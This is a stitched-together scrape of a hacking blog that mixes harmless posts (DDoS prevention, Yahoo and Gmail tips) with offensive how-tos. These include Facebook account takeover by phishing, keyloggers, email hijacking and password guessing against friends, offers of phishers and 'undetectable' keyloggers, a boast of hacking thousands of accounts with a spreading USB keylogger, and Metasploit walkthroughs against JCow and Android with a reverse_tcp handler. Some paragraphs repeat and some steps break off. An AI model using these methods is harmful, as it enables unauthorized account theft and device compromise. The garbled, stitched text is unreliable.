Tuesday, June 3, 2014

Distributed denial-of-service (DDoS) attacks are always in top headlines
worldwide, as they are plaguing websites in banks, and virtually of
almost every organization having a prominent online presence. The main
cause behind the proliferation of DDoS attacks is that there is a very
low-cost that the attacker has to incur to put such attack in motion.
Fortunately, today various prevention methods have been developed to
tackle such attacks. Before delving further into understanding about the
ways to prevent DDoS attack, let’s first understand what exactly a DDoS
attack is!

Understanding DDOS Attack

A DDoS (distributed denial-of-service) attack is an attempt made by
attackers to make computers’ resources inaccessible to its anticipated
user. In order to carry out a DDOS attack the attackers never uses their
own system; rather they create a network of zombie computers often
called as a “Botnet” – that is a hive of computers, to incapacitate a
website or a web server.

Let’s understand the basic idea! Now, the attacker notifies all the
computers present on the botnet to keep in touch with a particular site
or a web server, time and again. This increases traffic on the network
that causes in slowing down the speed of a site for the intended users.
Unfortunately, at times the traffic can be really high that could even
lead to shutting a site completely.

3 Basic Tips to Prevent a DDoS Attack
There are several ways to prevent the DDOS attack; however, here in this
guest post I’ll be covering three basic tips that will help you to
protect your website from the DDoS attack.

1.Buy More Bandwidth.

One of the easiest methods is to ensure that you have sufficient
bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS
attacks simply by buying more bandwidth so as to service the requests.
How does it help? Well, distributed denial of service is a nothing more
than a game of capacity. Let’s suppose you have 10,000 computer systems
each distributing 1 Mbps directed towards your way. This means you’re
getting 10 GB of data that is hitting your web server every second. Now,
that’s causes a lot of traffic!

So to avoid such issue, you need to apply the same rule intended for
normal redundancy. According to this technique, if you wish to have more
web servers just multiply around diverse datacenters and next make use
of load balancing. By spreading your traffic to various servers will
help you balance the load and will most likely create large space
adequate to handle the incessant increase in traffic.

However, there’s a problem with this method that is buying more
bandwidth can be a costly affair. And as you’ll know that the current
DDoS attacks are getting large, and can be a lot bigger exceeding your
budget limit.

2.Opt for DDoS Mitigation Services.

A lot of network or Internet-service providers render DDoS mitigation
capabilities. Look for an internet service provider having the largest
DDoS protection and mitigation network, automated tools, and a pool of
talented anti-DDoS technicians with the wherewithal to take action in
real-time as per the varying DDoS attack characteristics. A viable
alternative is to utilize a DDoS prevention appliance, which is
specifically intended to discover and prevent distributed
denial-of-service attacks.

3.Restricted Connectivity.

In case you have computer systems that are connected to the web
directly, a better idea is to properly install/configure your routers
and firewall so as to limit the connectivity. For an instance, while
receiving some data from a client machine you can only allow traffic to
pass from the machine only on a few chosen ports (like HTTP, POP, SMTP
etc.) via the firewall.

Wrapping Up!

Websites are largely getting attacked by hackers every second.
Denial-of-service attack is insanely getting huge and is creating a lot
of problems for business organizations having strong online vicinity. In
this guest post you’ll not only understand what a DDoS attack actually
means, but will also come to know about a few type of methods to prevent
DDoS attacks. Aforementioned are three tips that I’ll recommend you to
run through to at least understand where to get started towards building
a resilient web network with chances of surviving a DDoS attack.

Hi friends, I have already posted two posts on How to hack Facebook account password, first using the Keyloggers and other is using Phishing. Today I am going to reveal all the methods that can be used to hack a Facebook account password.

Today I will cover all 4 ways to Hack Facebook Account Password that all hackers usually use to hack your Facebook account.

3. By hacking the primary email address that user has used for creating Facebook account.

4. Social Engineering or simply Guessing your friends Password.

Facebook Phishing Attack:

I am explaining this method first because its the most easiest and also the most popular method for hacking Facebook password. You can also search on Google the various famous Facebook hacking methods and you will find Phishing technique on the top always. And I am explaining the methods according to their popularity.

Now you want to know which is my
favorite method for Hacking Facebook account passwords and i will
undoubtedly tell its simply PHISHING.

I will recommend my users to read this post for knowing how to hack Facebook using Phishing as i have explained it in detail here:

If
you want latest Facebook phisher then subscribe my Hacking tricks and
mail me privately or post your email below in comments. I will provide
you within a day, Now why i am not providing it directly, if i provide
directly then Facebook will block it again like the previous one.

Hacking Facebook account password remotely using Keyloggers and RAT's

Aaw...
Best method for advanced Hackers. And my second favorite too. Its
popularity is little but lower than Phishing only because it involves
you to download hack tooland
then create your keylogger and send it to victim which is a lengthy
process and also unsecured too as you don't aware that the keylogger
that you downloading is himself contain some spyware or simply a
keylogger attached with it. Keylogging
becomes more easy if you have physical access to victim computer as
only thing you have to do is install a keylogger and direct it to your
destination so that it will send all recorded keystrokes
to pointed destination. What a keylogger does is it records the
keystrokes into a log file and then you can use these logs to get
required Facebook password and thus can hack Facebook password.

I have written a complete article on How to hack Facebook
accounts remotely using Keyloggers, so i will recommend you to go
through that if you want to learn this technique in detail, so read this
article:

Now
if you need latest Fully Undetectable Keylogger, then subscribe my
hacking tricks and mail me privately or post ur email ID below in
comments on which you want to get the download link.

Hacking the Primary Email address

If Facebook hacker or any specific Keylogger, by some means, hacks your primary Gmail or yahoo account which you are using as primary email address, then this information account can easily hack your Facebook password using "Forgot password"
trick. The Hacker will simply ask Facebook to send password to the
primary email address and ask Facebook administrators to send the reset
email to your primary email address- which is already hacked. Thus, your
Facebook account password will be reset and it will also be hacked !So, always remember to protect your
primary email address that you have used to create Facebook account and
try to keep unknown or useless mail id as your primary email address in
Facebook.

Social Engineering or Guessing Passwords

This
method sounds to be pretty not working at beginning. Even I was
neglecting this way for a long time . But, once, I thought of using it
against my friend on Facebook and amazingly what happened that i guessed
his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For novice hackers, Social engineering is method of retrieving password or Guessing the password or answer of security
question simply be hacking some information about the victim or simply
gathering his information from his own Facebook and other social
networking profiles where most of users provide their critical
information just for fashion and doesn't know its consequences. You have
to be very careful while using this as victim must not be aware of your
intention. Just ask him cautiously using your logic.

Some Common passwords that you can try on your friends are :

1.
Their mobile number or their girlfriend or boyfriend mobile number.
(always try his previous or old mobile number as they are not as much as
fool that they appears)

2. Their Girlfriend or boyfriend names or their own names concatenating with their Girlfriend or boyfriend names.

3. Date of births

4.
Their favorite movie names , cartoon character names or favorite music
band names or simply the hero names like batman,dark knight,
Superman,Godzilla, Spartacus and much more..

5.
Most important now most website ask that password should be
alphanumeric now what users do they just adds 1,2,3 in their normal passwords and some more smart guys adds !,@,# in their passwords and amazingly all in Sequence.

Note
the above common passwords are not from any internet resource, its by
my own case study that i have come to conclusion after hacking 19,788
emails accounts. I know now you want to know how i hacked so much
accounts. As i have already mentioned for advanced hackers second option
is best and the only thing that i did was just made my Keylogger USB
and pendrive spreadable. Who ever used the infected USB drive also got
infected and this procedure goes so on. And last what happened my 10Gb
free storage was filled and i don't have enough time to clean it
regularly.

Dear readers today I am going to tell you How to Remove a Virus Using Command Prompt
Virus is a computer program that can copy itself and infect your
computer. These viruses can spread via USB/flash drive or from one
computer to other computer by few written codes. There are many
antivirus software available to remove viruses from computer. But there
are some viruses or suspicious files which can’t be removed by any
antivirus software.
Some suspicious files such as autorun.inf initiate
all the viruses in pc. These files must be removed for safe operation of
your pc, because they may lead to data loss, software damages etc. Such
viruses and files can be removed by using cmd. In this article we will
discuss how to remove a virus using command prompt. Following steps can
be used to remove a virus using command prompt from your computer.

Go to start menu and type “cmd” in the search box or Start>all programs>accessories>command prompt.

Open the infected drive such as write , g: to go to G drive.

Now type dir/w/a . It will show all the files of the drive including hidden files.

Locate AUTORUN.INF or any Virus and other suspicious files in the directory.

there was no virus in my drive so only autorun.inf is been highlighted.

Thursday, April 17, 2014

Level : MediumVictim Server : Windows XP SP3Victim vulnerable application : JCow 4.2Attacker O.S : Backtrack 5 R1
After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".
So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerableweb server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim
Okay I hope you understand what I say above to make it more realistic, let's try the tutorial…

Requirement :

1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

the text "framework"
with blue color it's because I'm using Backtrack 5 R1 and using
metasploit v4.0.1, so the name was depends on your Metasploit version,
maybe on your computer it can be "framework3" or "framework2" so on..
If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).
2. Open your Metasploit console and then use the exploit you just added before.

msf > use exploit/remote/jcow

3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).

Information :
Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.
4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.
Logon to http://onlinehackingtutorials.blogspot.in/
@ Copyright 2014 Pradeep Lodhi (Software Developer)

Nowadays
mobile users are increasing day by day, the security threat is also
increasing together with the growth of its users. Our tutorial for today
is how to Hacking Android Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply because lately android
phone growing very fast worldwide. Here in China you can get android
phone for only US$ 30 it's one of the reason why android growing fast. -
See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf

Nowadays mobile users are increasing day by day, the security threat is
also increasing together with the growth of its users. Our tutorial for
today is how to Hacking
Android Smartphone Tutorial using Metasploit. Why we choose android
phone for this tutorial? simply because lately android phone growing
very fast worldwide. Here in China you can get android phone for only
US$ 30 it's one of the reason why android growing fast.

Android is an operating system based on the Linux kernel, and designed
primarily for touchscreen mobile devices such as smartphones and tablet
computers. Initially developed by Android, Inc., which Google backed
financially and later bought in 2005, Android was unveiled in 2007 along
with the founding of the Open Handset Alliance: a consortium of
hardware, software, and telecommunication companies devoted to advancing
open standards for mobile devices.

and what is APK? according to wikipedia:

Android application package file (APK) is the file format used to
distribute and install application software and middleware onto Google's
Android operating system; very similar to an MSI package in Windows or a
Deb package in Debian-based operating systems like Ubuntu.

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim
to connect back to attacker machine, attacker needs to set up the
handler to handle incoming connections to the port already specified
above. Type msfconsole to go to Metasploit console.Info:

use exploit/multi/handler –> we will use Metasploit handlerset payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.Info:

5. Attacker already have the APK's file and now he will start
distribute it (I don't need to describe how to distribute this file,
internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's
file and install it. After victim open the application, attacker
Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:

Nowadays
mobile users are increasing day by day, the security threat is also
increasing together with the growth of its users. Our tutorial for today
is how to Hacking Android Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply because lately android
phone growing very fast worldwide. Here in China you can get android
phone for only US$ 30 it's one of the reason why android growing fast. -
See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf

Nowadays
mobile users are increasing day by day, the security threat is also
increasing together with the growth of its users. Our tutorial for today
is how to Hacking Android Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply because lately android
phone growing very fast worldwide. Here in China you can get android
phone for only US$ 30 it's one of the reason why android growing fast. -
See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf

Saturday, April 12, 2014

If you have been using Yahoo Mail and find yourself looking for some Tips and Tricks then Here is a collection of tips, tricks and Hacks for Yahoo Mail : Check out the latest episode of Upgrade Your Life on Yahoo! and manage your e-mails with latest Easter Eggs.

Yahoo! Tips Tricks and Hacks:

Trick:Instant Address Book Add
- Drag a message onto the Contacts link and you'll see the icon change
to a plus sign which means you can add that contact to your address book
in one easy step.Trick:Navigate your inbox the quick way
- Ctrl + Shift + Up Arrow or Down Arrow let you jump to messages in the
same folder that have the same subject line. You can hit Ctrl + Shift +
Alt + Up Arrow lets you choose another factor to filter on (such as
flag) when using Ctrl + Shift to navigate.Easter Egg:When composing a message just hit the Subject:
button to cycle through a collection of random (often humorous) subject
lines. A lot of real gems in here including: * The brain has been
polished professor. * All your platypus are belong to us. * I believe
those were mouse droppings. * The twins just turned 2 and 4 this month! *
How about never? Is never good for you? * Care for a foam apple?Hack:Organize Your inbox via Message Finder
- Now it is as easy as typing in a search, ordering the results by
Contact, Location, or Subject, selecting the messages, and dragging them
to a new folder. Sounds complicated? It isn't, just do a search and
then start dragging and dropping messages.Tip:Select Multiple Messages
- Hold shift after selecting a message to select multiple messages.
Hold Ctrl to add specific messages to the list. Hit Crtl-A to select all
messages in a folder or search results. This is a great way to select
everything in your inbox and move it to an archive folder. Set messages
to be read as soon as you click on them.Tip:Read Messages Now
- Go to Options link in the upper right hand corner and then select
Mail Options. Find the item labeled mark messages as read and select
immediately. This way when you scroll through messages you no longer
have to pause one each one to have it marked as read.Tip:Hide/Show Viewing Pane - Just hit the letter V on your keyboard to have more space to organize your folder. Hit V again to reopen the message preview.Tip:Quick Compose - Type the letter N to start a new message or R to reply to a selected message. Find text within a messageTrick:Find Text within your message
- Hit Crtl + F after selecting a message to find text within a that
message. Hitting the enter key lets your scroll through each instance of
the word within the message.Trick:Scroll through folder without reading - Holding Crtl lets you scroll through a folder messages using the arrow keys without selecting each individual message.Tip:Send Message Now - By using the Crtl + Enter Key you can send a message you are composing instantly. No more hunting for the send button.That's
it! There are quite a few more shortcuts document in the help section
but these are the one's I've found most valuable. Leave a comment and
share your Yahoo Mail tips.
Logon to http://onlinehackingtutorials.blogspot.in/
@ Copyright 2014 Pradeep Lodhi (Software Developer)

GMAIL

Gmail is a free,
advertising-supported email service provided by Google. Users may access
Gmail as secure webmail, as well as via POP3 or IMAP4 protocols. Gmail
initially started as an invitation-only beta release on April 1, 2004
and it became available to the general public on February 7, 2007,
though still in beta status at that time. The service was upgraded from
beta status on July 7, 2009, along with the rest of the Google Apps
suite.

With an initial
storage capacity offer of 1 GB per user, Gmail significantly increased
the webmail standard for free storage from the 2 to 4 MB its competitors
such as Hotmail offered at that time. Individual Gmail messages,
including attachments, may be up to 25 MB,. Gmail has a search-oriented
interface and a "conversation view" similar to an Internet forum. Gmail
is noted by web developers for its pioneering use of Ajax. Gmail runs on
Google GFE/2.0 on Linux. As of June 2012, it is the most widely used
web-based email provider with over 425 million active users worldwide.

Amazing gmail secret trick

Do you know ?You can create
multiple user accounts (IDs) on websites with a single gmail id. The
trick is to use only one Gmail account or gmail id and create many
different accounts. At-least every
website don't allow you to create more then one account associated with
same email id. It would be much of a chaotic situation, in case this was
possible for every website.Creating multiple accounts with Gmail is possible for a single website.

How to create many accounts on a websites with single email id?

Its possible because gmail account does not count dot(.) in email addresses.Example : xyz@gmail. com and x.yz@gmail.com both are same email address.

This simply means if you send email to x.yz@gmail.com then it will go to xyz@gmail.com. So if you already have your account on a website with xyz@gmail.com you can create an account by registering with x.yz@gmail.com

Similarly, you can
imagine how many accounts you would be able to create on same website
using a single email id, that too of gmail.

Note : 90% websites including twitter will allow you to signup with your single gmail id. But Facebook is listed in the other 10% of websites. It won't allow this even if you use dot.Hope you enjoyed the trick .
Logon to http://onlinehackingtutorials.blogspot.in/
@ Copyright 2014 Pradeep Lodhi (Software Developer)

Facebook Password Hack

Many
of you guys asked me to post any easy prank to hack facebook password
which doesn't require any phishing, key logger or any other difficult
method. So here I go with this amazing trick for you all guys to hack
any facebook password.This facebook hack trick will only work when the user has not logged in and is using chrome.Related : Add all facebook friends to a group in one clickLike us on Facebook for more such updates

Just follow these simple steps mentioned below to know the password of your facebook friend:-

Note : This prank works only when your
facebook friends entered their username and password and their password
is visible to you only as asterisk while they are using Google Chrome
browser .

Step 1 : Open Google
Chrome tab where your friends have entered their username and password
but password is visible only as asterisk (******) .

Step 2 : Now open console window by just pressing CTRL + SHIFT + J .

Step 3 : Copy the given code by selecting the given code and pressing CTRL + C

Ankit Fadia Hacking Tricks | Free Ebook Download

Ankit Fadia Hacking Tricks PDF Free Download

Assessing Server
Security - State of the Art. The talk takes into consideration the
progress that has been made in web server security over the last few
years, and the progress that has been made in attacking web servers over
the same time. The paper visits the new vulnerabilities introduced by
web applications and discuss the thinking applied to discover such
vulnerabilities. It finally describes the state of the art of web server
scanning technology. Ankit Fadia Hacking Tricks PDF Free Download